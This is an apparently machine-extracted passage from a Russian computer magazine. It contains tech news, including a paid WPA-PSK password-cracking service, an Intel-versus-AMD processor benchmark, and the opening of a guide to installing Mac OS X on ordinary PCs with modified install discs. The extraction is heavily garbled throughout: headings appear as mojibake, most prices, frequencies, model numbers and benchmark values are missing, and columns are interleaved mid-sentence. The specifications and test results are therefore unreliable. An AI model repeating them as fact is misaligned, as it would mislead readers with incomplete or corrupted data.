ÊËÅÏÀÞÙÈÅ È ÐÀÑÏÐÎÑÒÐÀÍßÞÙÈÅ ÔÅÉÊÎÂÛÅ
ÀÍÒÈÂÈÐÓÑÛ, ÓÆÅ ÇÀÐÀÁÎÒÀËÈ ÍÀ ÑÂÎÈÕ ÏÎÄÅËÊÀÕ
ÁÎËÅÅ $ ÌËÍ.
«ÇÅËÅÍÛÉ»
ÌÎÍÈÒÎÐ
Ассортимент компании Nec пополнился
новым монитором — дюймовая модель
MultiSync EAWMe станет первым на-
стольным монитором от Nec, использующим
светодиодную подсветку. Дисплей примеча-
телен низким энергопотреблением — за счет
использования светодиодов расход энергии,
по сравнению с мониторами с CCFL-под-
светкой, удалось сократить на 20%. Подчер-
кивается, что модель в высшей степени эко-
логична, то есть не содержит ртути, мышьяка
и галогена и полностью соответствует стан-
дартам ENERGY STAR , TCO и EPEAT
Gold. Остальные, более привычные глазу
характеристики таковы: соотношение сторон
, разрешение x , динамичес-
кая контрастность , максимальная
яркость — кд/кв.м. Монитор несет в себе
разъемы VGA, DVI, DisplayPort и USB, а также
комплектуется встроенными громкоговори-
телями. Его цена будет равняться примерно
$

XÀÊÅÐ 01 // 10


ÑÅÐÂÈÑ
ÏÎ ÏÎÄÁÎÐÓ ÏÀÐÎËÅÉ
Креативность некоторых людей не знает границ. Небезызвестный
хакер Мокси Марлинспайк, который ранее «развлекался» подде-
лкой SSL-сертификатов системы PayPal, и читал об этом доклады
на BlackHat, придумал новую затею. Он открыл сайт с говорящим
именем goalma.org, где предложил всем желающим свои
услуги по взлому WiFi-сетей. Ни для кого не секрет, что WPA-сети,
работающие в режиме PSK, взломать несложно, в частности, к ним
можно применить банальный брутфорс. Вот об этом-то и подумал
Марлинспайк, когда арендовал у Amazon EC2 «облако» на
процессоров, поднял простенький сайт и прикрутил ко всему этому
словарь на миллионов слов. Всего за $34 и 20 минут времени
(или $17 и 40 минут соответственно) WPA Cracker проверит, не
подходит ли какое-либо из млн. слов в качестве пароля к
нужной тебе WPA-PSK сетке. К слову, обычный двуядерник будет
перебирать те же млн. слов около 5 дней. Платежи находчивый
взломщик принимает легально, через Amazon Payments, а ресурс
позиционирует как сервис для проверки сетей на устойчивость
к взломам. В пору делать ставки, как долго протянет этот смелый
проект.

ÏÎ ÄÀÍÍÛÌ
«ËÀÁÎÐÀÒÎÐÈÈ
ÊÀÑÏÅÐÑÊÎÃλ,
 ÍÎßÁÐÅ ÍÀ PAYPAL
È EBAY ÏÐÈØËÎÑÜ
% È %
ÂÑÅÕ ÔÈØÈÍÃÎÂÛÕ
ÀÒÀÊ.

BLU-RAY/DVD
ÍÀ ÏÎÄÕÎÄÅ
Не прошло и пары лет с момента победы
формата Blu-ray над форматом HD DVD,
и в продаже, наконец-то, вот-вот начнут
появляться двухсторонние Blu-ray/DVD
диски. Дело в том, что у проигравше-
го войну формата HD DVD такие диски
появились еще в году, а в случае с
Blu-ray их выпуск явно придерживали
сознательно. Первой двухсторонней
ласточкой станет трилогия о Джейсоне
Борне. Цена на диски будет своего рода
золотой серединой — $, дешевле
Blu-ray, но дороже DVD. Стоит сказать, что
паки Blu-ray+DVD пользуются огромной
и вполне застуженной популярностью, и,
в целом, работают на благо продвижения
технологии Blu-ray в массы.

XÀÊÅÐ 01 // 10


Intel Co
Intel Core i7
FERRUM
АЛЕКСЕЙ ПОЛЯКОВ, ВЛАД ЗАХАРОВ
i7 Intel Core
i5

AMD Phenom
II X4 BE
Intel Core
i7 Extreme AMD Athlon
MD Phenom Edition II X4
I X4 BE

ÃÎÍÊÈ AMD
Phenom
II X4 BE

D Phenom
X4 BE
ÍÀ «ÊÀÌÍßÕ»
ÑÐÀÂÍÈÒÅËÜÍÎÅ ÒÅÑÒÈÐÎÂÀÍÈÅ ÏÐÎÖÅÑÑÎÐΠÐÀÇËÈ×-
AMD Athlon
II X4 ÍÎÉ ÀÐÕÈÒÅÊÒÓÐÛ ÎÒ INTEL È AMD

ÏÎÊÓÏÊÀ ÍÎÂÎÃÎ ÏÐÎÖÅÑÑÎÐÀ — Î×ÅÍÜ ÎÒÂÅÒÑÒÂÅÍÍÛÉ ØÀÃ. ÄÅËÎ ÄÀÆÅ ÍÅ Â


ÂÛÑÎÊÎÉ ÑÒÎÈÌÎÑÒÈ ÁÎËÜØÈÍÑÒÂÀ «ÊÀÌÍÅÉ»: ÀÐÕÈÒÅÊÒÓÐÛ ÐÀÇËÈ×ÍÛ È
ÍÅÑÎÂÌÅÑÒÈÌÛ ÌÅÆÄÓ ÑÎÁÎÉ, È ÂÛÁÎÐ ÒÎÉ ÈËÈ ÈÍÎÉ ÏËÀÒÔÎÐÌÛ ÍÅÈÇÁÅÆÍÎ
ÏÎÒßÍÅÒ ÇÀ ÑÎÁÎÉ, ÊÀÊ ÑÍÅÆÍÛÉ ÊÎÌ, ÇÀÌÅÍÓ ÄÐÓÃÈÕ ÂÀÆÍÛÕ ÝËÅÌÅÍÒÎÂ, ÒÀÊÈÕ
ÊÀÊ ÌÀÒÅÐÈÍÑÊÀß ÏËÀÒÀ È —  ÍÅÊÎÒÎÐÛÕ ÑËÓ×ÀßÕ — ÏÀÌßÒÜ. ÅÑËÈ ÆÅ ÏÎÒÎÌ ÒÛ
ÐÅØÈØÜ ÏÅÐÅÉÒÈ ÍÀ ÄÐÓÃÓÞ ÀÐÕÈÒÅÊÒÓÐÓ, ÒÎ ÂÑÅ ÝÒÈ ÍÅÌÀËÛÅ ÇÀÒÐÀÒÛ ÏÐÈÄÅÒÑß
ÏÎÂÒÎÐßÒÜ. Â ÎÁÙÅÌ, ÊÀÊ ÍÈ ÊÐÓÒÈ, ÂÛÁÎÐ ÍÅÏÐÎÑÒÎÉ. ÍÀÄÅÅÌÑß, ÍÀØ ÎÁÇÎÐ ÒÅÁÅ
 ÍÅÌ ÏÎÌÎÆÅÒ.

МЕТОДИКА роко известный пакет Everest. Встроенный бенч- ких задачах мы использовали тест из пакета
ТЕСТИРОВАНИЯ марк в архиваторе WinRAR — также эффективное 3DMark’06 CPU Score. Разумеется, не обошли мы
Первая часть тестирования проходила на штат- средство для оценки производительности CPU и стороной и тестирование производительности в
ных значениях тактовой частоты и напряжения. памяти; прогоняли мы и его. С целью выявления играх: были запущены бенчмарки для игр Far Cry
После этого для процессоров, которые нам уда- пригодности процессора для реальных ресурсо- 2 (х, Ultra High, AF 8x, DirectX 10) и Crysis
лось разогнать до одинаковой тактовой частоты емких задач использовались тесты Cinebench R10 Warhead (х, Enthusiast, AF 8x, DirectX 10).
МГц (а не удалось это сделать только с AMD (для измерения производительности в рендерен-
Athlon II X4 ), мы провели тот же набор тестов ге трехмерной картинки) и TMPG Enc — для ко-
на данной частоте. Последний тест был интере- дирования видео. Последнее компрессировалось
сен тем, что должен был объективно показать в формат MPEG х, а в качестве источ- ÒÅÑÒÈÐÓÅÌÎÅ
производительность различных процессоров, ника было взято некомпрессированное видео с ÎÁÎÐÓÄÎÂÀÍÈÅ:
работающих на одной и той же частоте. видеокамеры формата FullHD x 3DMark
Собственно вычислительную мощность ис- Vantage — популярный пакет для тестирования AMD ATHLON II X4
пытуемых процессоров мы оценивали в тесте графической подсистемы. Поскольку видеокарта AMD PHENOM II X4 BE
NuclearMC, показывающем скорость процессора использовалась во всех тестах одна и та же, нам AMD PHENOM II X4 BE
в арифметических задачах. Эффективность рабо- стало интересно, окажет ли процессор сущест- INTEL CORE I5
ты с оперативной памятью проверялась в наборе венное влияние на результат. А для тестирования INTEL CORE I7
тестов Memory Benchmark, который входит в ши- возможностей самого процессора в графичес- INTEL CORE I7 EXTREME EDITION

XÀÊÅÐ 01 // 10


Core

WINRAR ÒÅÑÒÎÂÛÉ ÑÒÅÍÄ


ÁËÎÊ ÏÈÒÀÍÈß, ÂÒ: , ENERMAX REVOLUTION
m AMD Athlon II X4
AMD Phenom II X4 ÆÅÑÒÊÈÉ ÄÈÑÊ, ÃÁ: , SSD OCZ VERTEX ÃÁ
AMD Phenom II X4 ÂÈÄÅÎÊÀÐÒÀ: AMD RADEON HD
Intel Core i5
Intel Core i7 ÏËÀÒÔÎÐÌÀ INTEL SOCKET
Intel Core i7 ÌÀÒÅÐÈÍÑÊÀß ÏËÀÒÀ: ASUS P6T6 WS REVOLUTION
0 ÎÏÅÐÀÒÈÂÍÀß ÏÀÌßÒÜ: DDR3 3X 1 ÃÁ KINGSTON ÌÃÖ CL7
MГц Default КБайт/с Â
В ТЕСТЕ АРХИВИРОВАНИЯ ОЧЕНЬ СИЛЬНО ВЫРЫВАЕТСЯ ВПЕРЕД ÏËÀÒÔÎÐÌÀ INTEL SOCKET
ПАРА СТАРШИХ ПРОЦЕССОРОВ INTEL И НЕМНОГО ОТСТАЕТ МЛАД- ÌÀÒÅÐÈÍÑÊÀß ÏËÀÒÀ: GIGABYTE P55M-UD4
ÎÏÅÐÀÒÈÂÍÀß ÏÀÌßÒÜ: DDR3 2X 1 ÃÁ KINGSTON ÌÃÖ CL7
m ШИЙ УЧАСТНИК ТЕСТА ОТ AMD. ОСТАЛЬНЫЕ НЕ ДЕМОНСТРИРУЮТ
СУЩЕСТВЕННЫХ РАЗЛИЧИЙ В ПРОИЗВОДИТЕЛЬНОСТИ Â
BE ÏËÀÒÔÎÐÌÀ AMD SOCKET AM2+
ÌÀÒÅÐÈÍÑÊÀß ÏËÀÒÀ: ASUS M4A79 DELUXE
ÎÏÅÐÀÒÈÂÍÀß ÏÀÌßÒÜ: DDR2 2X 1 ÃÁ KINGSTON HYPERX
ÌÃÖ CL5 Â

AMD ATHLON AMD PHENOM


II X4 II X4 BE
ðóá. ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:
РАЗЪЕМ: SOCKET AM2+/AM3
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ: АРХИТЕКТУРА: K10 ðóá.
РАЗЪЕМ: SOCKET AM2+/AM3 ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45
АРХИТЕКТУРА: K10 ЧАСТОТА, ГГЦ: 3,0
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45 ШИНА, МГЦ:
ЧАСТОТА, ГГЦ: КЭШ-ПАМЯТЬ L3, МБАЙТ: 6
ШИНА, МГЦ: ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ:
КЭШ-ПАМЯТЬ L3, МБАЙТ: 2 КОЛИЧЕСТВО ЯДЕР: 4
ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ: 95 МНОЖИТЕЛЬ: СВОБОДНЫЙ
КОЛИЧЕСТВО ЯДЕР: 4
МНОЖИТЕЛЬ: 13

В разогнанном состоянии в большинстве тестов процессор почти


догоняет AMD Phenom II X4 BE, который старше и дороже. Поэто-
Из-за низкой цены этот процессор можно посоветовать для использо- му данную модель можно порекомендовать фанатам-оверклокерам с
вания в различных бюджетных системах — таких, как офисные рабочие небольшим бюджетом. Свободный множитель и «выносливость» про-
станции, или системы для дома начального уровня. Еще один плюс цессора при высокой температуре дают возможность, имея серьезную
— низкий уровень тепловыделения: греется он слабее, чем первые систему охлаждения (правда, уже не воздушную), разгонять его вдвое
Phenom’ы. по сравнению с номинальной тактовой частотой. Но и просто с хорошим
кулером из него можно выжать немало.

Производительность по теперешним меркам крайне низка. Кроме того,


отсутствие свободного множителя не позволяет сколько-нибудь сущест- Несмотря на температурную «выносливость», уровень тепловыделения у
венно повысить ее с помощью разгона. модели довольно большой — требуется серьезное охлаждение.

XÀÊÅÐ 01 // 10


FERRUM

EVEREST MEMORY WRITE FARCRY 2


AMD Athlon II X4 AMD Athlon II X4
AMD Phenom II X4 AMD Phenom II X4
AMD Phenom II X4 AMD Phenom II X4
Intel Core i5 Intel Core i5
Intel Core i7 Intel Core i7
Intel Core i7 Intel Core i7
0 0 10 20 30 40 50 60 70 80
MГц Default МБайт/с MГц Default fps

СТРАННЫЙ РЕЗУЛЬТАТ (ВПЕРЕД ВЫРЫВАЕТСЯ МЛАДШАЯ ПРОЦЕССОР МАЛО ПОВЛИЯЛ НА РЕЗУЛЬТАТЫ ТЕСТА: «ПОГОДУ»
МОДЕЛЬ INTEL CORE I5 В РАЗОГНАННОМ СОСТОЯНИИ) ОБЪ- ДЕЛАЕТ ВИДЕОКАРТА. ТЕМ НЕ МЕНЕЕ, МЛАДШИЕ МОДЕЛИ ОТ
ЯСНЯЕТСЯ ТЕМ, ЧТО ЗДЕСЬ ЗА СЧЕТ МЕНЬШЕГО МНОЖИТЕЛЯ INTEL И AMD (AMD ATHLON II X4 И INTEL CORE I5 ) ЧУТЬ-ЧУТЬ
ПРИШЛОСЬ ВЫСТАВИТЬ БОЛЬШУЮ ЧАСТОТУ ШИНЫ — ВОТ И ВСЕ. ОТСТАЛИ ОТ ОСТАЛЬНЫХ
В ЦЕЛОМ ЖЕ, ПРОЦЕССОРЫ INTEL ИДУТ ВПЕРЕДИ С СУЩЕСТВЕН-
НЫМ ОТРЫВОМ

ðóá.
AMD PHENOM INTEL CORE ðóá.
II X4 BE i5
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:
РАЗЪЕМ: SOCKET AM2+/AM3 ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:
АРХИТЕКТУРА: K10 РАЗЪЕМ: SOCKET
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45 АРХИТЕКТУРА: LYNNFIELD
ЧАСТОТА, ГГЦ: ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45
ШИНА, МГЦ: ЧАСТОТА, ГГЦ:
КЭШ-ПАМЯТЬ L3, МБАЙТ: 6 ШИНА, ГБИТ/C:
ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ: КЭШ-ПАМЯТЬ L3, МБАЙТ: 8
КОЛИЧЕСТВО ЯДЕР: 4 ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ: 95
МНОЖИТЕЛЬ: СВОБОДНЫЙ КОЛИЧЕСТВО ЯДЕР: 4
МНОЖИТЕЛЬ: 21 (МАКСИМУМ — 24)

Старшая модель от AMD из принявших участие в нашем тесте. Без


разгона демонстрирует неплохую производительность, а стоит при этом Недорогой (если сравнивать с другими изделиями от Intel) процессор,
весьма скромно. показавший, тем не менее, неплохие результаты. Отставание во многих
тестах от старших собратьев было весьма существенным, но все равно
производительность оказалась где-то на уровне старших моделей AMD.
Лишь в некоторых из тестов процессор обгоняет самого младше-
го участника нашего тестирования от Intel. Разогнанный более
дешевый AMD Phenom II X4 BE практически ничем не уступил В отличие от флагманских моделей Intel, у этого процессора отсутствует
старшей модели ни в производительности, ни в стабильности. Более поддержка Hyper-Threading. Удивительно, но в тестах FarCry2 и Crysis
того, AMD Phenom II X4 BE сильнее греется, так что серьезно Warhead, где влияние процессора на производительность вообще мини-
разогнать этот «камень» относительно номинальной частоты может мально, Intel Core i5 заметно уступил двум участникам от AMD и занял
и не получиться. предпоследнее место. Не сильно лучше результат и в 3DMark CPU Score.

XÀÊÅÐ 01 // 10


ÊÎÄÈÐÎÂÀÍÈÅ ÂÈÄÅÎ NUCLEARMC
AMD Athlon II X4
AMD Athlon II X4
AMD Phenom II X4
AMD Phenom II X4
AMD Phenom II X4
AMD Phenom II X4
Intel Core i5
Intel Core i5
Intel Core i7
Intel Core i7
Intel Core i7
Intel Core i7
0 1 1,5 2 2,5 3 3,5 4 4,5
0
MГц Default время, с
MГц Default

И ЗДЕСЬ РЕЗУЛЬТАТЫ ОКАЗАЛИСЬ ДОВОЛЬНО ПРЕДСКАЗУЕМЫ- ВЫЧИСЛЕНИЯ УЧАСТНИКАМ ТЕСТИРОВАНИЯ ОТ INTEL ДАЮТСЯ
МИ: ВПЕРЕД ВЫРЫВАЮТСЯ ТОПОВЫЕ МОДЕЛИ ОТ INTEL, А AMD ЯВНО ЛУЧШЕ. В РАЗОГНАННОМ СОСТОЯНИИ AMD PHENOM II X4
СУЩЕСТВЕННО ОТСТАЕТ BE И AMD PHENOM II X4 BE ВЫДАЮТ ПРАКТИЧЕСКИ ИДЕНТИЧ-
НЫЕ РЕЗУЛЬТАТЫ. ТО ЖЕ КАСАЕТСЯ И ПАРЫ INTEL CORE I7 И
INTEL CORE I7 EXTREME EDITION

ðóá.

INTEL CORE INTEL CORE ðóá.


i7 i7 Extreme Edition
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ: ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:
РАЗЪЕМ: SOCKET РАЗЪЕМ: SOCKET
АРХИТЕКТУРА: NEHALEM АРХИТЕКТУРА: NEHALEM
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45 ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45
ЧАСТОТА, ГГЦ: ЧАСТОТА, ГГЦ:
ШИНА, ГБИТ/C: ШИНА, ГБИТ/С:
КЭШ-ПАМЯТЬ L3, МБАЙТ: 8 КЭШ-ПАМЯТЬ L3, МБАЙТ: 8
ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ: ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (TDP), ВТ:
КОЛИЧЕСТВО ЯДЕР: 4 КОЛИЧЕСТВО ЯДЕР: 4
МНОЖИТЕЛЬ: 20 (МАКСИМУМ — 21) МНОЖИТЕЛЬ: СВОБОДНЫЙ

Процессор, основанный на архитектуре Nehalem, в абсолютном боль- Флагман от Intel вышел абсолютным победителем практически из всех
шинстве тестов показал прекрасную производительность, существенно тестов, продемонстрировав рекордную производительность. Ему мы и
обогнав и участников от AMD, и своего младшего собрата. А стоит денег присуждаем награду «Выбор редакции».
хоть и не очень маленьких, но вполне разумных. В разогнанном же
состоянии он практически не уступил старшему (и почти вчетверо более
дорогому!) собрату — Intel Core i7 Extreme Edition. Безусловно, покупать лишь процессор по цене компьютера (не самого,
кстати, медленного) могут позволить себе только очень состоятельные
пользователи, которых интересует не соотношение «цена/качество»,
Модель не назовешь подходящей для экстремальных «гонщиков»: а все только самое-самое. Тем более, разница в производительности с
максимальный множитель 21 накладывает ограничения на разгонный младшим Intel Core i7 оказалась не такой уж существенной.
потенциал.

Intel среднего ценового диапазона обгоняют Награду «Лучшая покупка» получает процес-
ÂÛÂÎÄÛ самые старшие модели от AMD. Так что выбор сор AMD Phenom II X4 BE, показавший
Они, в общем-то, очевидны. При наличии для действительно мощной системы, когда хорошую производительность при мини-
совсем небольшого количества денег сегод- финансовые затраты не столь важны — одно- мальных затратах, а «Выбор редакции» при-
ня на базе AMD можно собрать более шуструю значно Intel, а нам лишь остается ждать, пока суждается флагману линейки процессоров
конфигурацию, чем на Intel. Но уже модели от AMD выпустит более быстрые процессоры. Intel — Core i7 Extreme Edition.z

XÀÊÅÐ 01 // 10


PC_ZONE
СЕРГЕЙ ИСАКОВ [email protected]

×ÒÎ ÍÀÌ ÑÒÎÈÒ


MAC ÏÎÑÒÐÎÈÒÜ?
ÓÑÒÀÍÀÂËÈÂÀÅÌ ÌÀÊÎÑ ÍÀ ÎÁÛ×ÍÛÉ
ÊÎÌÏÜÞÒÅÐ
ÑËÎÆÍÎ ÍÅ ÇÀÌÅÒÈÒÜ ËÞÁÎÂÜ ÐÀÇÐÀÁÎÒ×ÈÊÎÂ È ÄÈÇÀÉÍÅÐÎÂ Ê ÏÐÎÄÓÊÖÈÈ MAC. ÑÒÎÈÒ
ÒÎËÜÊÎ ÎÒÊÐÛÒÜ ÔÎÒÎÃÐÀÔÈÈ ÈÇ ÎÔÈÑÎÂ ÓÑÏÅØÍÛÕ IT-ÊÎÌÏÀÍÈÉ È ÑÒÀÐÒÀÏÎÂ… ÂÎÇ-
ÍÈÊÀÅÒ ÆÅËÀÍÈÅ ÏÎÏÐÎÁÎÂÀÒÜ ÕÂÀËÅÍÓÞ ÑÈÑÒÅÌÓ ÑÀÌÎÌÓ, ÍÎ ÑÅÐÜÅÇÍÛÉ ÖÅÍÍÈÊ ÒÓÒ
ÆÅ ÎÑÒÓÆÀÅÒ ÏÛË. ÎÄÍÀÊÎ ÂÛÕÎÄ ÅÑÒÜ!

Ê
омпьютеры Apple Macintosh всегда ÂÛÁÎÐ ÊÎÍÔÈÃÓÐÀÖÈÈ ринской платы с используемым южным
были элитными и в нашей стране На какое железо реально поставить МакОС? мостом — тоже непростая задача. По произ-
скорее представляют собой экзотику. Не на любое! водителям можно утверждать, что популяр-
Люди либо ничего про них не знают, 1. ПРОЦЕССОР. ные ASUS и Gigabyte для этих целей вполне
либо восхищаются их красотой и Оптимальным выбором будет Intel Core 2 пригодны. Нужно понимать, что другие чип-
удобством. Даже среди тех, кто все-таки знает, Duo, но от Интел подойдут и Core Duo, Core сеты nForce, VIA, SIS, AMD/ATI использовать
что это, многие не могут себе позволить такой Solo (Yonah), Core 2 Quad, Xeon, Pentium M скорее нельзя, чем можно, хотя есть и такие
компьютер, в первую очередь из-за стоимости. (новой серии), Core i5, i7, Atom. Важно, чтобы работающие хакинтоши.
Еще больший аргумент против — якобы боль- они поддерживали набор инструкций SSE3; 3. ПАМЯТЬ.
шие проблемы с программным обеспечением впрочем, с процессорами SSE2 (Pentium M Ничего особого. Если у тебя работает WindowsXP,
в России. (старый), Pentium 4) тоже реально, но с опре- то MacOSX тем более будет работать.
Впрочем, некоторые компании стали про- деленными проблемами. Аналогично можно 4. ЖЕСТКИЙ ДИСК.
давать так называемые клоны системы, попытаться поставить систему на AMD, но — Опять же, ничего необычного.
собранные на самом обычном железе, но при используя специальное ядро, созданное для Предпочтительнее с интерфейсом SATA, хотя
этом — с предустановленной MacOSX. Такая этих целей. Насчет Атома возникли новые и старый IDE-интерфейс вполне пригоден.
система практически неотличима от ориги- сложности, впрочем, уже преодолеваемые Размер — современный: 10 Гб достаточно
нальной, на ней можно запускать любые про- хакинтош-сообществом. для установки системы, которая еще займет
граммы и даже обновлять ее в онлайне. Мы 2. СИСТЕМНАЯ ПЛАТА. место для виртуальной памяти, для файла
решили разобраться, как им такое удалось и На оригинальных Маках используются чип- гибернации и собственных кешей, но всегда
как собирается хакинтош. А заодно — какие сеты Intel и nForce. Есть сведения о простой хочется чего-то большего, и программ поста-
отличия имеются с оригинальной фирменной установке на чипсеты Intel , x, P, вить, и музыки, и фильмов Модель значе-
системой. EP31, EP45 и другие. Более важно понятие ния не имеет.
Итак, устанавливаем на домашний PC, южного моста: ICH7,8,10 поддерживаются 5. ВИДЕОКАРТА.
наряду с Windows, еще и MacOS (ХакОС) оригинальными драйверами, ICH9 требует Принципиально, что драйвера для видеокарт
в пробных целях. В любой момент можно некоторых патчей, MCP79 тоже относится существуют только для современных Nvidia,
вернуться в привычную среду (и как там к родным мостам. Перечислить, какие есть ATI и Intel. И то не все модели. VIA Chrome,
становится тоскливо после такого праздни- платы на рынке с такими же чипсетами, SIS, Matrox и большинство устаревших карт
ка жизни!). нереально, да и сопоставить модель мате- шансов не имеют. Более старые модели воз-

XÀÊÅÐ 01 // 10


ВОТ ОНО: MACOS X НА ОБЫЧНОМ КОМПЬЮТЕРЕ!

можно использовать с MacOSX Tiger, а для и Broadcom. Ниже по тексту будет пример жесткий диск SATA Гб, DVD-RW Optiarc. В
современной Snow Leopard перечень прибли- оживления адаптера Broadcom целом — современный середнячок эконом-
зительно таков: 9. USB-УСТРОЙСТВА. класса.
• Nvidia Geforce 7xx00, GT — GT (x Видеокамера, блютус, ТВ-тюнер, флеш-
не меньше 3) накопитель, WiFi, принтер, сканер, клавиатура ÂÛÁÎÐ ÎÏÅÐÀÖÈÎÍÍÎÉ ÑÈÑÒÅÌÛ
• ATI Radeon X, X, X, HD, и мышь работают практически все. На Интел-совместимых компьютерах можно
HD, HD, HD, HD, HD DVD-RW ПРИВОД. запустить MacOSX x Tiger, MacOSX x
• Intel GMA, X — версии для мобиль- Тоже работают практически все, как с интер- Leopard и новейшую MacOSX x Snow
ных компьютеров. фейсом SATA, так и с ATA. Но последний вызо- Leopard. Разумеется, предпочесть стоит
• Мобильные версии nVidia и ATI — очень вет некоторые проблемы при инсталляции. последнюю, но при этом:
большие проблемы. Подводя черту под этим обзором, следует 1. Видеокарты Radeon — возможно
6. ЗВУКОВАЯ КАРТА. сказать, что всегда есть риск, что какое-то полноценно запустить только в Тигре.
Для устаревшего стандарта AC97 есть драй- устройство в системе окажется неподдер- 2. Видеокарты nVidia Geforce 5x00 — 6x00 еще
вер, подходящий для большинства карт живаемым. Ты можешь поискать решение возможно запустить в Леопарде.
производства Realtek и Analog Devices. Для в интернете, либо смириться, мол, пробуя 3. Снежный Барс пока не является хорошо
нового стандарта HDA (High Definition Audio) МакОС, и не рассчитывал, что оно понадо- отлаженной стабильной системой.
есть варианты практически для всех встроен- бится. Внешние различия между системами не столь
ных карт. А вот с PCI-картами нужно выяснять Видеокарта, даже если она не поддержива- и велики, да и совместимость с программным
индивидуально. ется, все равно будет показывать изображе- обеспечением не является решающим аргу-
7. СЕТЕВОЙ АДАПТЕР. ние в одном из стандартных режимов VESA, ментом: все работает в Леопарде, и многое
Практически любые на чипах Realtek или например, х, но отсутствие поддержки — в Тигре. С другой стороны, очень совре-
Marvell, несколько сложнее — с Intel и 3Com, OpenGL ограничит тебя в списке программ, менным компьютерам может подойти только
также есть драйвера на некоторые карты которые можно использовать. К примеру, не очень современная система, опять таки из-за
Broadcom (x, ). Приходится оговари- будут запускаться системные шахматы и DVD- драйверов.
ваться, ибо есть проблемы с модификациями, player. Вместе с развитием операционной системы
например, Marvell или Intel А уси- Итак, в пробной конфигурации мы выбрали трудилось и хак-сообщество, обеспечивая
лиями хак-сообщества созданы драйвера под десктоп на основе системной платы Gigabyte совместимость ОС со стандартными компью-
некоторые модификации nForceLAN. EPUD3LR с процессором Intel Core 2Duo терами. Так, для установки Тигра требовалось
8. WIFI-АДАПТЕР. E, память 2х1 Гб, звуковая карта встро- подменять ядро системы и ряд жизненно важ-
Вопрос актуален для владельцев ноутбу- енная Realtek ALC, сетевой адаптер ных программ на модифицированные версии.
ков. Работают адаптеры на чипах Atheros Realtek , видеокарта Palit Geforce GT, В Леопарде появилось понятие ванильного

XÀÊÅÐ 01 // 10


PC_ZONE

ком, инсталляционным скриптом и набором


драйверов. Выбрав эту сборку, ты можешь
стартовать прямо с нее и иметь тот же
результат с меньшим количеством усилий.

ÏÐÎÖÅÑÑ ÈÍÑÒÀËËßÖÈÈ
Может быть, на твоем компьютере уже стоит
система Windows, и ты не хочешь ее уничто-
жать, а может быть, ты планируешь ее только
поставить. В этом случае начинать следует
с нее. Во-первых, МакОС требует, чтобы
SATA-винчестер работал в режиме AHCI. Для
южного моста ICH7 этого не требуется, а вот
для других — более чем желательно. И если
для Windows Vista в этом нет проблемы, то
для Windows XP не все так гладко. Сам дис-
трибутив Windows XP SP2 не содержит драй-
вера AHCI и не пожелает устанавливаться
на HDD в таком режиме, а после установки
системы драйвер RAID/AHCI не хочет прини-
маться системой, потому что такое устройство
не включено в БИОСе. Попытка же вклю-
чения в БИОСе режима приводит к синему
ЗАГРУЗЧИК CHAMELEON-2 экрану при загрузке XP. Тупик?! Для южного
моста ICH8 существует корректный инстал-
лятор драйвера, — ищи на прилагаемом
ядра, т.е. оригинальное ядро от самой Эппл. Вариант: переделать сам установочный диск, диске, его также можно модифицировать для
Система стала родной, немодифицированной, чтобы он содержал в себе обход этой защиты, инсталляции на ICH9 путем редактирования
только с небольшими добавками. В Снежном да еще и набор дополнительных драйверов, inf-файла, заменой на Для других
Барсе количество необходимых добавок чтобы систему можно было поставить на вариантов придется искать другие пути.
убавилось, ниже мы расскажем, почему. более широкий круг компьютеров. Такой диск Что ж, с этой проблемой ты справился, и
Впрочем, эти трюки применимы и к Леопарду, называется сборкой, и есть люди, которые Windows у тебя работает с винчестером
просто они разработаны уже с выходом их производят, возможно, и в коммерческих в режиме AHCI. Преимущество скорости
системы По каждой из этих версий тре- целях, а чаще за просьбу о пожертвовании. В очевидно. Менее очевидно, но для нас
буется отдельный рассказ, но речь пойдет чем минусы? Поскольку сборку делали не мы важнее — совместимость с МакОС. Теперь
только про последнюю, самую современную сами, то не знаем, что конкретно там изме- следует выделить раздел для установки
версию операционной системы с названием нено, и остается только верить, что исправ- OSX. Раздел должен быть первичным, а не
Snow Leopard (он же Барсик). ления нужные и безопасные. Возможны логическим диском в расширенном разделе!
изменения внешнего вида и логотипов — Простейший способ: щелкнуть правой кла-
ÂÛÁÎÐ ÄÈÑÒÐÈÁÓÒÈÂÀ дескать, система неоригинальная и будьте вишей мыши по значку «Мой компьютер»,
Оригинальные компьютеры Apple Macintosh добры видеть логотип создателя сборки. Не выбрать «Управление» Æ «Накопители» и
комплектуются дисками с операционной очень корректно, все же, сама система созда- произвести стандартные действия по созда-
системой, однако эти диски являются на компанией Apple и ее стоит уважать. Для нию нового первичного раздела в формате
модельно-зависимыми, и, стало быть, непри- подобных случаев существует пакет Restore_ FAT Если это невозможно, то можно вос-
годны для наших целей. Пригодным будет Desktop_Settings, который нетрудно найти в пользоваться одной из программ управления
диск с пометкой Retail, который является интернете и с ним вернуть оригинальный вид разделами: Partition Magic, Paragon Partition
общим для всех моделей. Просто поставить с оболочки. Еще один минус — версия систе- Manager, Acronis. Существует и бесплатный,
